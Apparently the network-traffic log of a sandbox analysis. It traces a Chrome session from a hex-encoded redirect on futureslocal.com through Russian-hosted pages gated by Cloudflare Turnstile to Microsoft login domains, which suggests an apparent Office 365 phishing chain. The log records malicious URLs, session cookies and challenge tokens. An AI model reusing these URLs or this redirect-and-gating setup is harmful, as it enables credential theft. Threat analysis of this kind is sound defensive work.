Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f375838782e6469676974616c766f796167652e72752f786178622f-scorpion HTTP/1.1Host: futureslocal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f375838782e6469676974616c766f796167652e72752f786178622f-scorpion HTTP/1.1Host: futureslocal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /xaxb/ HTTP/1.1Host: 7x8x.digitalvoyage.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://7x8x.digitalvoyage.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://7x8x.digitalvoyage.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://7x8x.digitalvoyage.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://7x8x.digitalvoyage.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://7x8x.digitalvoyage.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6202638555e78&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 7x8x.digitalvoyage.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://7x8x.digitalvoyage.ru/xaxb/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjloMEpHdU9aNTVxeWh2N01sNnh2Vnc9PSIsInZhbHVlIjoicU1NRnBHc3VhcUdNMkRET055RTlxSGMycDBKQjgwYkFTWXk5eEk4RSt4WENwaFV4L2loejFxUTJ1MWRCMERmRmR1VUFKcHlScEh4WVQ5SisxRHFzdnBqU0VtaHYyR0NYK0drMWEvSVJmamNINUJoRlhDM0xmTG5sZi9RYkdlbWMiLCJtYWMiOiJhN2M2YzQ1NDQxNzA4YjM1N2VkNzk1ZTc2ZGFjMWFlYTc0MzcwZjU1ZWQ0ODI2NDIyN2M0MTgwNDJjMjA2OGExIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImVlS0RUcnhwZ05Oa2RLZVJEVU9kS3c9PSIsInZhbHVlIjoiV0R3TXV0OGtQZjJKQzlnSGxpN0hIeXVQWHRDdkRQZzIzTklXU1QzWEYwZXJQMzkxelpaYUpYRlBnRTArR1Fld3l6NHV1aDV6ay9ubFRiVlVQd2pMMVFIRG1UUTBMYVFqSmd2SXVoSDVZR0x4Z29BbnJuV0g5RFlYVVc4alBNYU8iLCJtYWMiOiJhMmJjNDJmMjYyYzJiZTViNGExYmE2MzkxZTE1NDc0NDA5MGNmYWViNGFkYTdhNjhjNDhmODU2NGU4ZGYwMDM5IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6202638555e78&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe6202638555e78/1736275745391/xSVrIn8xCejtnR6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe6202638555e78/1736275745391/xSVrIn8xCejtnR6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fe6202638555e78/1736275745394/47801d01b633f5853ccee222f6369c4f157328d309ea959c6ffee87f510f2278/hatudjn-Xn1x_Eh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tptlykbbjyrpxzwekcoUjUvVlZQLDEXIGMPVUGOILAXMMANLVDNEEIONYXUKFUINWCZJYGPCVWQ HTTP/1.1Host: nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://7x8x.digitalvoyage.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://7x8x.digitalvoyage.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tptlykbbjyrpxzwekcoUjUvVlZQLDEXIGMPVUGOILAXMMANLVDNEEIONYXUKFUINWCZJYGPCVWQ HTTP/1.1Host: nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: futureslocal.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 7x8x.digitalvoyage.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3215sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasXsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 18:49:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 9275Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mS%2BSvftu%2FM9y10SgHt2G7NAeC0bqMj4hrxiWPGvuRdNCCnilPQ1Sanfz6Cb6zUOf6zIAiDT7U8Fld0hG92W3flQATbLyo8jx17Lsvpbg3E2BzBiXYc5DPgBkwgP0fQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1255&min_rtt=1230&rtt_var=370&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2276&delivery_rate=2217457&cwnd=250&unsent_bytes=0&cid=980e0f9051f545ea&ts=24&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8fe6202d0852c34f-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1912&min_rtt=1555&rtt_var=838&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1904&delivery_rate=1877813&cwnd=181&unsent_bytes=0&cid=06facd7bd082af8e&ts=3624&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 18:49:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: BjzHT0jJ1x5Y/F+Nk6moRlaNFL8dKPfVfBI=$B8S9i70q2sKm2Yovcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fe620377ba943f8-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 18:49:09 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: C6NOGMcrGt6nLMIIUZZ/nAEy/Sky2PLHEjY=$fkM1pqH/idjcAQrhServer: cloudflareCF-RAY: 8fe6204cfe125e6a-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 18:49:19 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: WYh0gdoJqXl0LgyhlUwTuoQ8qEQY37lLdLA=$8XBpsP0pbSyn5CFDServer: cloudflareCF-RAY: 8fe6208b4e2e41c6-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_150.3.dr, chromecache_148.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_126.3.dr, chromecache_116.3.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_126.3.dr, chromecache_116.3.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
